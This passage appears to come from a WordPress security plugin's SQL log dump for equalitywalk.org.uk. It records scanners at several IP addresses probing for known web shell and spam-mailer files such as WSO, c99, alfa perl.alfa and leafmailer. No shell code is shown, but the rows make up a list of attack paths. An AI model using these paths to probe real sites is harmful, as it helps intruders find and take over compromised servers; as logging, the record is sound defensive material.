,1674412445.8351,100,'dGpPykS0uDEVeH4j18Mw6zNB','','13|0|0|0|equalitywalk.org.uk/ws.php'),('216.226.146.228',3638727396,'',0,1674412453.6665,100,'6P7MnhfNka4wx0jd3STsvzKW','','13|0|0|0|equalitywalk.org.uk/2.php'),('216.226.146.228',3638727396,'',0,1674412464.6615,100,'ftnvm8IrHuKXPATkd452WEGM','','13|0|0|0|equalitywalk.org.uk/lol.php'),('216.226.146.228',3638727396,'',0,1674412472.1216,100,'jB7gKEVQTAp1Sfv3HbN6dJa8','','13|0|0|0|equalitywalk.org.uk/87.php'),('216.226.146.228',3638727396,'',0,1674412478.1480,100,'hV7JkPIYcaGvrxuZ4f3NWjyp','','13|0|0|0|equalitywalk.org.uk/7yn.php'),('216.226.146.228',3638727396,'',0,1674412485.9913,100,'t0fZde4lTpBa6YkxOuizADIg','','13|0|0|0|equalitywalk.org.uk/haxor.php'),('216.226.146.228',3638727396,'',0,1674412494.6290,100,'1dsNvRDMChfnorSB3yxAliOF','','13|0|0|0|equalitywalk.org.uk/13.php'),('216.226.146.228',3638727396,'',0,1674412510.2607,100,'Xg6PRWm0ZDdG4lyA8CKHItNU','','13|0|0|0|equalitywalk.org.uk/e.php'),('216.226.146.228',3638727396,'',0,1674412521.4193,100,'KQJb9qaRex14BXhoWusLEd6k','','13|0|0|0|equalitywalk.org.uk/r.php'),('216.226.146.228',3638727396,'',0,1674412532.1195,100,'Ltk0SR31OpIQmqczuo69MPbd','','13|0|0|0|equalitywalk.org.uk/t.php'),('216.226.146.228',3638727396,'',0,1674412538.5663,100,'P0DeFfoHCN1Ka6BXyTrMwnAg','','13|0|0|0|equalitywalk.org.uk/y.php'),('216.226.146.228',3638727396,'',0,1674412546.0461,100,'JUTXtwraqlO6ydb5nj237KR0','','13|0|0|0|equalitywalk.org.uk/u.php'),('216.226.146.228',3638727396,'',0,1674412552.4567,100,'9retW0HJDhF3zuRdsS1bICEn','','13|0|0|0|equalitywalk.org.uk/i.php'),('216.226.146.228',3638727396,'',0,1674412559.3056,100,'6YqnSIZEs5Q7TLWkVhG9B0Uz','','13|0|0|0|equalitywalk.org.uk/p.php'),('216.226.146.228',3638727396,'',0,1674412566.7674,100,'IhWCfBDpsOYGbKFP4lZmn6uz','','13|0|0|0|equalitywalk.org.uk/q.php'),('216.226.146.228',3638727396,'',0,1674412575.1548,100,'iYXH5TnxsEmF4AypkMaI9Ror','','13|0|0|0|equalitywalk.org.uk/s.php'),('216.226.146.228',3638727396,'',0,1674412586.3772,100,'SZsGQu3lBzpTUYIjbLqKPkef','','13|0|0|0|equalitywalk.org.uk/d.php'),('216.226.146.228',3638727396,'',0,1674412594.0471,100,'dCq7iKhcgXATUp8Yf6PHI4yD','','13|0|0|0|equalitywalk.org.uk/h.php'),('216.226.146.228',3638727396,'',0,1674412601.3676,100,'ISyOtKD0Qnb4Up5ejTaY9sPV','','13|0|0|0|equalitywalk.org.uk/j.php'),('216.226.146.228',3638727396,'',0,1674412609.7657,100,'4j8wJ6V7aHoBsI3Mg5cACPQU','','13|0|0|0|equalitywalk.org.uk/k.php'),('216.226.146.228',3638727396,'',0,1674412614.6020,100,'7b683xPCzT4WyMgs2OIcJKSj','','13|0|0|0|equalitywalk.org.uk/l.php'),('216.226.146.228',3638727396,'',0,1674412620.1069,100,'fAyp7OVYvqhlFC26mdBu9tTx','','13|0|0|0|equalitywalk.org.uk/n.php'),('216.226.146.228',3638727396,'',0,1674412626.2688,100,'2cfNpSuraQLU6kWJoKy0PT9j','','13|0|0|0|equalitywalk.org.uk/xindex.php'),('216.226.146.228',3638727396,'',0,1674412631.3702,100,'IGR1zdkm3XTbCxO6VuKyStLc','','13|0|0|0|equalitywalk.org.uk/kindex.php'),('216.226.146.228',3638727396,'',0,1674412635.2812,100,'jPXFrlhxvwDb37zcQC4JUBsZ','','13|0|0|0|equalitywalk.org.uk/FoxWSOv1.php'),('216.226.146.228',3638727396,'',0,1674412644.0830,100,'o0UQFNzfT19ewA8gCr4niLvd','','13|0|0|0|equalitywalk.org.uk/alf.php'),('216.226.146.228',3638727396,'',0,1674412651.8681,100,'E7qCGdt4gLTND6juH3AezryU','','13|0|0|0|equalitywalk.org.uk/bb.php'),('216.226.146.228',3638727396,'',0,1674412660.6495,100,'tmXzS8p9eGbYLWBKJUMlgrkv','','13|0|0|0|equalitywalk.org.uk/lf.php'),('216.226.146.228',3638727396,'',0,1674412667.5645,100,'N8R2WGnByebLuXQpHgDFCo0m','','13|0|0|0|equalitywalk.org.uk/WSO.php'),('216.226.146.228',3638727396,'',0,1674412674.8932,100,'BfaebPtDpOg6GcWNC19kjMhF','','13|0|0|0|equalitywalk.org.uk/xxx.php'),('216.226.146.228',3638727396,'',0,1674412682.9096,100,'EHWMhXU8tFjObfkeVpxq9ZNY','','13|0|0|0|equalitywalk.org.uk/hello.php'),('216.226.146.228',3638727396,'',0,1674412693.0208,100,'HdzSE1uimXpkNoYZV3DFC8lL','','13|0|0|0|equalitywalk.org.uk/ok.php'),('216.226.146.228',3638727396,'',0,1674412702.8633,100,'pOaN1sbFchVzv5eIJYo4w6fi','','13|0|0|0|equalitywalk.org.uk/if.php'),('216.226.146.228',3638727396,'',0,1674412709.1218,100,'2eMUJbdvFjxQHlzKtDWCaoip','','13|0|0|0|equalitywalk.org.uk/kk.php'),('216.226.146.228',3638727396,'',0,1674412716.8511,100,'C68GDutgRAIew0vFSplLfqNz','','13|0|0|0|equalitywalk.org.uk/mrjn.php'),('216.226.146.228',3638727396,'',0,1674412725.0821,100,'78CoyYWhKGnTOF6LJQg2jfd9','','13|0|0|0|equalitywalk.org.uk/kn.php'),('216.226.146.228',3638727396,'',0,1674412734.3554,100,'ZOYnUV5qcQ063B8PWaR9L4Iw','','13|0|0|0|equalitywalk.org.uk/3301.php'),('216.226.146.228',3638727396,'',0,1674412741.0180,100,'6GJTW5htC4Ew3KZsYS0rQ87H','','13|0|0|0|equalitywalk.org.uk/leaf.php'),('216.226.146.228',3638727396,'',0,1674412747.6881,100,'qynAokYIWeuTXH2JVSDGpa4L','','13|0|0|0|equalitywalk.org.uk/alex.php'),('216.226.146.228',3638727396,'',0,1674412755.0128,100,'VMXNheBS5GLrbOwInYdix2Aa','','13|0|0|0|equalitywalk.org.uk/mailer.php'),('216.226.146.228',3638727396,'',0,1674412764.4886,100,'SQkL94AGVPyHgu7thxTo1c2n','','13|0|0|0|equalitywalk.org.uk/anone.php'),('216.226.146.228',3638727396,'',0,1674412770.1338,100,'ERbv6Hgj8FO9Ql17cfymoPhL','','13|0|0|0|equalitywalk.org.uk/wp-configer.php'),('20.14.84.163',336483491,'',0,1674412771.3102,55,'gxyYuJbThjcEv4BZi5UQOdPa','','19|0|0|0|www.equalitywalk.org.uk/leafmailer2.8.php'),('216.226.146.228',3638727396,'',0,1674412775.0088,100,'BjNt8zYCgWiHXU3GhAxDdK0a','','13|0|0|0|equalitywalk.org.uk/wp-ad.php'),('216.226.146.228',3638727396,'',0,1674412779.8305,100,'lwYmPsT7Dein1B2cbFoEhZN9','','13|0|0|0|equalitywalk.org.uk/send.php'),('20.14.84.163',336483491,'',0,1674412783.3824,55,'j1C5RH9uLiQ72xSAkJEa3fcd','','19|0|0|0|www.equalitywalk.org.uk/leaf.php'),('216.226.146.228',3638727396,'',0,1674412786.2405,100,'cMAt91LswfUyXWTRxSFvEVGa','','13|0|0|0|equalitywalk.org.uk/3.php'),('216.226.146.228',3638727396,'',0,1674412789.0423,100,'Z6UmlCbuyHgz97aMONXB3vD0','','13|0|0|0|equalitywalk.org.uk/.wp-cache.php'),('20.14.84.163',336483491,'',0,1674412793.2692,55,'FJiOzPLM3o70IhWcRgXBp5rA','','19|0|0|0|www.equalitywalk.org.uk/lf.php'),('216.226.146.228',3638727396,'',0,1674412799.4456,100,'Asla7foQFV24hRYjSmxX8Dw9','','13|0|0|0|equalitywalk.org.uk/sendmail.php'),('20.14.84.163',336483491,'',0,1674412803.2353,55,'lsLRQyhCpjdD0EnbKfUXFB6G','','19|0|0|0|www.equalitywalk.org.uk/leafmailer.php'),('216.226.146.228',3638727396,'',0,1674412804.8274,100,'GhKTAEjr5a6UeYRC0kW8tJgz','','13|0|0|0|equalitywalk.org.uk/rahma.php'),('20.14.84.163',336483491,'',0,1674412811.0264,55,'rLNHOS0D1MciGqKPpz4ZE68l','','19|0|0|0|www.equalitywalk.org.uk/wp-conetnt/leaf.php'),('20.14.84.163',336483491,'',0,1674412811.0664,10,'rLNHOS0D1MciGqKPpz4ZE68l','','707|0|0|0|www.equalitywalk.org.uk/wp-conetnt/leaf.php'),('216.226.146.228',3638727396,'',0,1674412815.1700,100,'mAFWw4jf9bMC1u5PNEVLI3RD','','13|0|0|0|equalitywalk.org.uk/nasgor.php'),('20.14.84.163',336483491,'',0,1674412819.2161,55,'XNbaOVF5sh1mSey7i9kQcJ3G','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/leaf.php'),('216.226.146.228',3638727396,'',0,1674412821.5316,100,'DjF8Pv1ikhfZ7pTMIrguSVc5','','13|0|0|0|equalitywalk.org.uk/wp-confirm.php'),('216.226.146.228',3638727396,'',0,1674412828.1864,100,'wGjFa257eQbR4ud1HnVWyqDT','','13|0|0|0|equalitywalk.org.uk/alfa123.php'),('216.226.146.228',3638727396,'',0,1674412838.7443,100,'qp9kEZV0KhdLDzGeMTtJ7r4x','','13|0|0|0|equalitywalk.org.uk/upload.php'),('216.226.146.228',3638727396,'',0,1674412844.5229,100,'2l6bkm1XA5dNSI7GqDho3zsp','','13|0|0|0|equalitywalk.org.uk/bypass.php'),('216.226.146.228',3638727396,'',0,1674412850.6076,100,'thyxMrXqjWDVzIHFgNZSQod6','','13|0|0|0|equalitywalk.org.uk/wp-one.php'),('216.226.146.228',3638727396,'',0,1674412856.3637,100,'NBh0PMp8oUymRlEne7wGT1Li','','13|0|0|0|equalitywalk.org.uk/alexus.php'),('216.226.146.228',3638727396,'',0,1674412863.0227,100,'PKilLSfd712b8aUtTIpAGNvZ','','13|0|0|0|equalitywalk.org.uk/wso1337.php'),('216.226.146.228',3638727396,'',0,1674412869.2202,100,'LFB7NHgiGDarMmjvfWRh0CwZ','','13|0|0|0|equalitywalk.org.uk/1337.php'),('216.226.146.228',3638727396,'',0,1674412874.7522,100,'OjM5RSrloxktIUTL3QqFc79V','','13|0|0|0|equalitywalk.org.uk/blog.php'),('216.226.146.228',3638727396,'',0,1674412880.3516,100,'5uW2TtZqKUs7n8YIgrmBkeD1','','13|0|0|0|equalitywalk.org.uk/it.php'),('216.226.146.228',3638727396,'',0,1674412884.7166,100,'Wkp7cPfbs1Nnvj3R4iyJKZXU','','13|0|0|0|equalitywalk.org.uk/kiss.php'),('216.226.146.228',3638727396,'',0,1674412890.1843,100,'FjOTsIG87JoA9U0xZatLiWDn','','13|0|0|0|equalitywalk.org.uk/0.php'),('216.226.146.228',3638727396,'',0,1674412895.8390,100,'9OcACHB7Xosw8EZyDSmxKiQU','','13|0|0|0|equalitywalk.org.uk/wp2.php'),('216.226.146.228',3638727396,'',0,1674412907.1820,100,'Gi35xVR8su4ImQOCAwtaNSUe','','13|0|0|0|equalitywalk.org.uk/owl.php'),('216.226.146.228',3638727396,'',0,1674412917.0193,100,'ms0ZwEqcM7YbJ8kXVf2aeilx','','13|0|0|0|equalitywalk.org.uk/vuln.php'),('216.226.146.228',3638727396,'',0,1674412923.1286,100,'0gYB6Rp9VMislfcS5bxGXAIy','','13|0|0|0|equalitywalk.org.uk/ohayo.php'),('216.226.146.228',3638727396,'',0,1674412928.8516,100,'hs0C7Lbxiko9uJzf8NqFarXI','','13|0|0|0|equalitywalk.org.uk/wp-admin.php'),('20.14.84.163',336483491,'',0,1674412929.1894,55,'w6sbvfztRqCTKo7PxFDiha2k','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/leafmailer2.8.php'),('216.226.146.228',3638727396,'',0,1674412935.5772,100,'3MhKEDyjOSnqIJsgZivf8PA7','','13|0|0|0|equalitywalk.org.uk/cms.php'),('20.14.84.163',336483491,'',0,1674412940.7154,55,'r0a6oHhmOFgJb3AxWD7Yqz1P','','19|0|0|0|www.equalitywalk.org.uk/mailer.php'),('216.226.146.228',3638727396,'',0,1674412946.0849,100,'aF1BCohVXzyQUONLdtbl70g9','','13|0|0|0|equalitywalk.org.uk/wp-uploads.php'),('20.14.84.163',336483491,'',0,1674412947.1675,55,'rAJN3f2RgSX9apq81BWDTCkm','','19|0|0|0|www.equalitywalk.org.uk/leaf-mailer.php'),('216.226.146.228',3638727396,'',0,1674412954.2196,100,'s2QDzVXkRtPLFdUGonTHZWcw','','13|0|0|0|equalitywalk.org.uk/Gel.php'),('20.14.84.163',336483491,'',0,1674412955.6510,55,'fKxYn4CyQ2jm6oDtLuT5qp7l','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/leafmailer2.8.php'),('216.226.146.228',3638727396,'',0,1674412962.2804,100,'W4s1SpMNCgYAOPLicRDtwB7m','','13|0|0|0|equalitywalk.org.uk/41.php'),('20.14.84.163',336483491,'',0,1674412963.6577,55,'CFzUPVaAMLR98Xx4Kdcwneyu','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/leafmailer.php'),('20.14.84.163',336483491,'',0,1674412969.5941,55,'ATa6f3KNRJr9Cu5pw1tExXFM','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/leaf.php'),('216.226.146.228',3638727396,'',0,1674412970.0481,100,'D9joZLBA716uyxWCHiepO4Nt','','13|0|0|0|equalitywalk.org.uk/4price.php'),('20.14.84.163',336483491,'',0,1674412979.1451,55,'iBJpY9TjSZ2wl0G7LnPQV1fb','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/lf.php'),('216.226.146.228',3638727396,'',0,1674412979.1703,100,'gBHeWcC89T1m6DEUIzZPnbvu','','13|0|0|0|equalitywalk.org.uk/MARIJUANA.php'),('216.226.146.228',3638727396,'',0,1674412986.0576,100,'pZ9T3fHMi7n5E1IavAtxGKUc','','13|0|0|0|equalitywalk.org.uk/.fk.php'),('216.226.146.228',3638727396,'',0,1674412991.8942,100,'jocgJUOFP4GEHYZyd5ke7bn1','','13|0|0|0|equalitywalk.org.uk/XxX.php'),('20.14.84.163',336483491,'',0,1674412999.3019,55,'5gd8yvbW2CqRL4SoaisNz0jX','','19|0|0|0|www.equalitywalk.org.uk/.tmb/leaf.php'),('216.226.146.228',3638727396,'',0,1674413000.6459,100,'EBH31YmAgtleOS2cPDaG0kX4','','13|0|0|0|equalitywalk.org.uk/alexuse.php'),('216.226.146.228',3638727396,'',0,1674413005.3305,100,'s62LzgrpAUhcI9O7xQBvnuwM','','13|0|0|0|equalitywalk.org.uk/Sendemail.php'),('20.14.84.163',336483491,'',0,1674413008.9845,55,'SNZHxJYbfpITuq2EQ6VPgrle','','19|0|0|0|www.equalitywalk.org.uk/mailer2.8.php'),('216.226.146.228',3638727396,'',0,1674413009.7997,100,'Md8xsYKvAlbSNczED6G9riRL','','13|0|0|0|equalitywalk.org.uk/content.php'),('216.226.146.228',3638727396,'',0,1674413018.6739,100,'mE2C5Q4u6NynvYS3bBHcIxsX','','13|0|0|0|equalitywalk.org.uk/leafmailer2.8.php'),('20.14.84.163',336483491,'',0,1674413024.4777,55,'k98BnmtIiwXEKW7CgTb2OD54','','19|0|0|0|www.equalitywalk.org.uk/1.php'),('216.226.146.228',3638727396,'',0,1674413029.2783,100,'5p7gZXChAcKLjTdUqzG4E9vs','','13|0|0|0|equalitywalk.org.uk/olu.php'),('216.226.146.228',3638727396,'',0,1674413035.6099,100,'vrR6Hs5pSo3IDumOe7YnMiht','','13|0|0|0|equalitywalk.org.uk/alexusmailer%202.0.php'),('20.14.84.163',336483491,'',0,1674413042.8716,55,'9ywbLcladqYQIuZ6NFkzrfpm','','19|0|0|0|www.equalitywalk.org.uk/2.php'),('216.226.146.228',3638727396,'',0,1674413044.2708,100,'mxHAOZIg6T0F3XDJzsLkl4RV','','13|0|0|0|equalitywalk.org.uk/rss.php'),('216.226.146.228',3638727396,'',0,1674413050.4708,100,'wa6zIUiHXAvcWD2t0BoLQdxj','','13|0|0|0|equalitywalk.org.uk/alexus-mailer.php'),('216.226.146.228',3638727396,'',0,1674413059.9118,100,'HgGtdTlSC09IiJP521jBrYwh','','13|0|0|0|equalitywalk.org.uk/wp-file.php'),('216.226.146.228',3638727396,'',0,1674413069.4346,100,'lu2fRA7C6ZHXw3myNsxePkLI','','13|0|0|0|equalitywalk.org.uk/wso2.php'),('20.14.84.163',336483491,'',0,1674413072.8752,55,'7luXrK0AFkQ83HCnVwMcseWi','','19|0|0|0|www.equalitywalk.org.uk/3.php'),('216.226.146.228',3638727396,'',0,1674413074.7542,100,'OdQwAcIraho4SWquM83kinR9','','13|0|0|0|equalitywalk.org.uk/wso1.php'),('20.14.84.163',336483491,'',0,1674413080.1859,55,'Zo759czeINJa1L3j6fhbFkvV','','19|0|0|0|www.equalitywalk.org.uk/m.php'),('216.226.146.228',3638727396,'',0,1674413082.6663,100,'YqR8XGpUNo9EWPs5M20eahbn','','13|0|0|0|equalitywalk.org.uk/olux.php'),('216.226.146.228',3638727396,'',0,1674413086.0174,100,'hHVTQavfN8OZXkICj56ArsdK','','13|0|0|0|equalitywalk.org.uk/wp-info.php'),('20.14.84.163',336483491,'',0,1674413087.9363,55,'cUmCxk1FiyalMoNS7sv4fDj8','','19|0|0|0|www.equalitywalk.org.uk/c.php'),('216.226.146.228',3638727396,'',0,1674413094.2153,100,'qVXHKRgaA5NOxwuPCev2lkSU','','13|0|0|0|equalitywalk.org.uk/xl.php'),('20.14.84.163',336483491,'',0,1674413099.0143,55,'YVDnUPghvRxy2WlNTfFkqaoC','','19|0|0|0|www.equalitywalk.org.uk/k.php'),('216.226.146.228',3638727396,'',0,1674413101.4390,100,'qBZKTMbON8xRvjoDeJrm6Qah','','13|0|0|0|equalitywalk.org.uk/wp-confiig.php'),('216.226.146.228',3638727396,'',0,1674413108.2309,100,'NQBOfbLYzIxd3aqGnTP84jMZ','','13|0|0|0|equalitywalk.org.uk/file-manager.php'),('20.14.84.163',336483491,'',0,1674413110.0133,55,'xzbwQ5sPX6pRBALhCl02tukV','','19|0|0|0|www.equalitywalk.org.uk/a.php'),('216.226.146.228',3638727396,'',0,1674413115.8948,100,'gyCdK825xRstbU1mwGrTNBFa','','13|0|0|0|equalitywalk.org.uk/uploader.php'),('216.226.146.228',3638727396,'',0,1674413128.6914,100,'zZ8N7mk3goAxFy9lt1biMCcP','','13|0|0|0|equalitywalk.org.uk/leafmailer.php'),('216.226.146.228',3638727396,'',0,1674413138.3295,100,'ezFkhXp5vLt6gjP9cSYyGnH4','','13|0|0|0|equalitywalk.org.uk/ALFA_DATA/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413145.0020,100,'RLrHkPynbC9oOmXKSGaxd2Q6','','13|0|0|0|equalitywalk.org.uk/.well-known/ALFA_DATA/alfacgiapi/perl.alfa'),('20.14.84.163',336483491,'',0,1674413148.0202,55,'vitnW1byu4as7Co2eSjQfwdF','','19|0|0|0|www.equalitywalk.org.uk/28.php'),('216.226.146.228',3638727396,'',0,1674413151.5272,100,'gHmLD5boqB4iF0TjAudXE7wI','','13|0|0|0|equalitywalk.org.uk/tmp_images/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413159.2212,100,'4kVv1TDpuCaA7lIBGS3XogL8','','13|0|0|0|equalitywalk.org.uk/wp-admin/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413175.8192,100,'Qc54pyVCwFmd0hB316JxPDLO','','13|0|0|0|equalitywalk.org.uk/wp-includes/alfacgiapi/perl.alfa'),('20.14.84.163',336483491,'',0,1674413179.8842,55,'HXFBlvODmxijuIyYMLwzKhpA','','19|0|0|0|www.equalitywalk.org.uk/.Wp-maiiler.phP'),('216.226.146.228',3638727396,'',0,1674413184.1382,100,'CeFZ92JDfERGh8LqzkHyS05K','','13|0|0|0|equalitywalk.org.uk/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413188.6908,100,'wvVXSlJKQ3OqoHatxsGhizU7','','13|0|0|0|equalitywalk.org.uk/css/ALFA_DATA/alfacgiapi/perl.alfa'),('20.14.84.163',336483491,'',0,1674413191.3100,55,'4KEsFmJ6XU9W0kCHexLgorOu','','19|0|0|0|www.equalitywalk.org.uk/owl.php'),('216.226.146.228',3638727396,'',0,1674413193.3502,100,'1DGgN7wmjJXsICKY8hZP0bpV','','13|0|0|0|equalitywalk.org.uk/files/ALFA_DATA/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413200.6578,100,'58VMU6IBYmwx2btiDOfrKFQn','','13|0|0|0|equalitywalk.org.uk/images/ALFA_DATA/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413208.6674,100,'5spg2yCGUAFZtKhN4Wdr3eco','','13|0|0|0|equalitywalk.org.uk/ALFA_DATA/alfacgiapi/perl.alfa%22'),('216.226.146.228',3638727396,'',0,1674413215.6099,100,'wK0cGl9rmOvJaPAWdftBi6uo','','13|0|0|0|equalitywalk.org.uk/wp-admin/ALFA_DATA/alfacgiapi/perl.alfa'),('20.14.84.163',336483491,'',0,1674413218.0002,55,'pEHXkmS8xQ1G52YRdrD7vJj3','','19|0|0|0|www.equalitywalk.org.uk/wp-maiiler.php'),('216.226.146.228',3638727396,'',0,1674413230.5619,100,'ECdxJQtNkbFpngDLr368jYlW','','13|0|0|0|equalitywalk.org.uk/wp-includes/ALFA_DATA/alfacgiapi/perl.alfa'),('216.226.146.228',3638727396,'',0,1674413233.3411,100,'CWw7JNmtpyuaTEURYV0ALDrK','','13|0|0|0|equalitywalk.org.uk/date.php'),('216.226.146.228',3638727396,'',0,1674413237.2455,100,'5kfocY6j9yeiTBKZuvWSrElg','','13|0|0|0|equalitywalk.org.uk/about.php'),('20.14.84.163',336483491,'',0,1674413237.7181,55,'pvlR0ABLJI8nC4HwxtqEbmQg','','19|0|0|0|www.equalitywalk.org.uk/send.php'),('216.226.146.228',3638727396,'',0,1674413244.1112,100,'d5eMlmAnWjC2bsXEqiurY3gz','','13|0|0|0|equalitywalk.org.uk/alfaindex.php'),('216.226.146.228',3638727396,'',0,1674413251.2455,100,'ZUAWEPtfnzrR5d4bGwm1Thqe','','13|0|0|0|equalitywalk.org.uk/.alf.php'),('20.14.84.163',336483491,'',0,1674413255.4757,55,'USb4BtQxqjuXdnewTYhasAkE','','19|0|0|0|www.equalitywalk.org.uk/.Wp-maiiler.phP'),('20.14.84.163',336483491,'',0,1674413265.8904,55,'OCwzM7HNG9iu5AV0oEKdelZr','','19|0|0|0|www.equalitywalk.org.uk/alexus.php'),('216.226.146.228',3638727396,'',0,1674413277.8609,100,'FzZlBxdTOc1A53JmPupkg8wU','','13|0|0|0|equalitywalk.org.uk/snd.php'),('216.226.146.228',3638727396,'',0,1674413282.1320,100,'ictMfvbQCFuhJKW5yDgNqr30','','13|0|0|0|equalitywalk.org.uk/wp-class.php'),('216.226.146.228',3638727396,'',0,1674413287.3781,100,'E8RNaybxHJnVP9TkwuipYKFC','','13|0|0|0|equalitywalk.org.uk/small.php'),('216.226.146.228',3638727396,'',0,1674413345.8732,100,'9NAJuK2S7QD65kZILVX1WFrh','','13|0|0|0|equalitywalk.org.uk/Marvins.php'),('216.226.146.228',3638727396,'',0,1674413349.7309,100,'h6dcL8ZV0U9Fe5RWEIGtTar1','','13|0|0|0|equalitywalk.org.uk/wp-includes/css/modules.php'),('216.226.146.228',3638727396,'',0,1674413358.4339,100,'ILaDzq0WTG8dYvbBerg2nVFp','','13|0|0|0|equalitywalk.org.uk/indoxploit.php'),('216.226.146.228',3638727396,'',0,1674413399.4102,100,'KMqXhjBOtN1Sxangl3dYLsek','','13|0|0|0|equalitywalk.org.uk/modules/mod_simplefileuploadv1.3/elements/udd.php'),('216.226.146.228',3638727396,'',0,1674413404.1847,100,'DiXMH3PUVJYSzvR1TNrqwC7u','','13|0|0|0|equalitywalk.org.uk/libraries/joomla/css.php'),('216.226.146.228',3638727396,'',0,1674414053.1139,100,'EpMxIjHr9dlnYs2F6wJ0ZON8','','13|0|0|0|equalitywalk.org.uk/libraries/joomla/jmails.php'),('167.172.248.229',2813130981,'',0,1674417754.5632,55,'LP4F3WEmlngR0pZhvUNqMfj6','','19|0|0|0|www.equalitywalk.org.uk/cgi-bin/mt/mt-xmlrpc.cgi'),('167.172.248.229',2813130981,'',0,1674417754.5729,55,'BiDcX760Nf4VFUsCgoJtILOT','','19|0|0|0|www.equalitywalk.org.uk/wp-plain.php'),('167.172.248.229',2813130981,'',0,1674417760.2033,55,'QqU1di8ab2GWKMz9BmorJnj4','','19|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/v3XZA.php'),('167.172.248.229',2813130981,'',0,1674417760.2145,55,'wG8SRdjOAsqQcVhE0JX9TBZo','','19|0|0|0|www.equalitywalk.org.uk/cyz.php'),('167.172.248.229',2813130981,'',0,1674417760.2160,55,'NftFeqUuxVG30y2A7W5wEzra','','19|0|0|0|www.equalitywalk.org.uk/V78qh.php'),('167.172.248.229',2813130981,'',0,1674417760.2447,10,'QqU1di8ab2GWKMz9BmorJnj4','','707|0|0|0|www.equalitywalk.org.uk/ALFA_DATA/alfacgiapi/v3XZA.php'),('167.172.248.229',2813130981,'',0,1674417760.7280,55,'vhYKd9e68Vt7EqlzPCykWxcs','','19|0|0|0|www.equalitywalk.org.uk/mt/mt-xmlrpc.cgi'),('167.172.248.229',2813130981,'',0,1674417766.4095,55,'sLQT6hNCtynJDfmjrSBbMR5w','','19|0|0|0|www.equalitywalk.org.uk/css/ALFA_DATA/alfacgiapi/v3XZA.php'),('167.172.248.229',2813130981,'',0,1674417766.4137,100,'tp8g4bR7MmxS3UJvy90EDVAX','','13|0|0|0|www.equalitywalk.org.uk/cyz.php'),('167.172.248.229',2813130981,'',0,1674417777.2037,55,'wKnH36emfv9RhTUJyPBtpkY4','','19|0|0|0|www.equalitywalk.org.uk/cgi-bin/mt-xmlrpc.cgi'),('20.244.36.78',351544398,'',0,1674422516.6201,55,'oUhWITv1LjnSFMRfViyXeJHa','','19|0|0|0|www.equalitywalk.org.uk/xleet.php'),('20.244.36.78',351544398,'',0,1674422517.4362,55,'5QBNoJ2n8KveidTDh9c0bFRy','','19|0|0|0|www.equalitywalk.org.uk/0byte.php'),('20.244.36.78',351544398,'',0,1674422518.9390,55,'8L6mQG1ETt9ReCjDxgzpFS03','','19|0|0|0|www.equalitywalk.org.uk/sym.php'),('20.244.36.78',351544398,'',0,1674422519.7342,55,'8TK97bWj0ROBhA2fQkCiPXZl','','19|0|0|0|www.equalitywalk.org.uk/sym403.php'),('20.244.36.78',351544398,'',0,1674422520.5266,55,'gyGMPNWc07izfJul9QhdHO1U','','19|0|0|0|www.equalitywalk.org.uk/xl.php'),('20.244.36.78',351544398,'',0,1674422520.5572,10,'gyGMPNWc07izfJul9QhdHO1U','','707|0|0|0|www.equalitywalk.org.uk/xl.php'),('20.244.36.78',351544398,'',0,1674422521.3487,55,'9gBrFK6ZQ7zEydevGpLXq3Yj','','19|0|0|0|www.equalitywalk.org.uk/symlink.php'),('20.244.36.78',351544398,'',0,1674422522.1307,55,'owz9JH7VafR6r1enpcBFgiDX','','19|0|0|0|www.equalitywalk.org.uk/wp.php'),('20.244.36.78',351544398,'',0,1674422522.9382,55,'v21xzTW0qy4IXdswuSali3P6','','19|0|0|0|www.equalitywalk.org.uk/404.php'),('20.244.36.78',351544398,'',0,1674422523.7068,55,'xBvbjuLrpelKyhsPYa2DNdJw','','19|0|0|0|www.equalitywalk.org.uk/403.php'),('20.244.36.78',351544398,'',0,1674422524.5331,55,'ChEiaWUKnk6829ot1JDeZ3rb','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('20.244.36.78',351544398,'',0,1674422525.3182,55,'Fad0v4kQlwxDORsHfJcKy52S','','19|0|0|0|www.equalitywalk.org.uk/c99.php'),('20.244.36.78',351544398,'',0,1674422526.1017,55,'glFjxC8KSanWGEAi9YyM4dD7','','19|0|0|0|www.equalitywalk.org.uk/xxx.php'),('20.244.36.78',351544398,'',0,1674422526.8868,55,'dPU087gJOimpvksMWyHnu1lb','','19|0|0|0|www.equalitywalk.org.uk/ok.php'),('20.244.36.78',351544398,'',0,1674422527.6957,55,'bNrCI8SXznhW9jTUaO7Lq4Vw','','19|0|0|0|www.equalitywalk.org.uk/0.php'),('20.244.36.78',351544398,'',0,1674422528.5012,55,'aJ5cINSx3fTlyuHdkmM6FXWU','','19|0|0|0|www.equalitywalk.org.uk/x.php'),('20.244.36.78',351544398,'',0,1674422529.3024,55,'LM6DKY3a75wJloGrj4NzCfQu','','19|0|0|0|www.equalitywalk.org.uk/xx.php'),('20.244.36.78',351544398,'',0,1674422530.1012,55,'jUJkVb4IPNhWE8AuMw376cSa','','19|0|0|0|www.equalitywalk.org.uk/1.php'),('20.244.36.78',351544398,'',0,1674422530.9008,55,'QLklH6MR1ctOUnwAGxbD0FpK','','19|0|0|0|www.equalitywalk.org.uk/2.php'),('20.244.36.78',351544398,'',0,1674422531.7091,55,'wF38WeND7Lbl19oZ2SIyVavm','','19|0|0|0|www.equalitywalk.org.uk/3.php'),('20.244.36.78',351544398,'',0,1674422532.5081,55,'mMIOz7DXev6YjrNilGwaPyRQ','','19|0|0|0|www.equalitywalk.org.uk/4.php'),('20.244.36.78',351544398,'',0,1674422533.3334,55,'neoIhtSq9QDM1vAcbsRkpgld','','19|0|0|0|www.equalitywalk.org.uk/5.php'),('20.244.36.78',351544398,'',0,1674422534.5352,55,'Le8tuYq5miHAPkd4BNoTMnUD','','19|0|0|0|www.equalitywalk.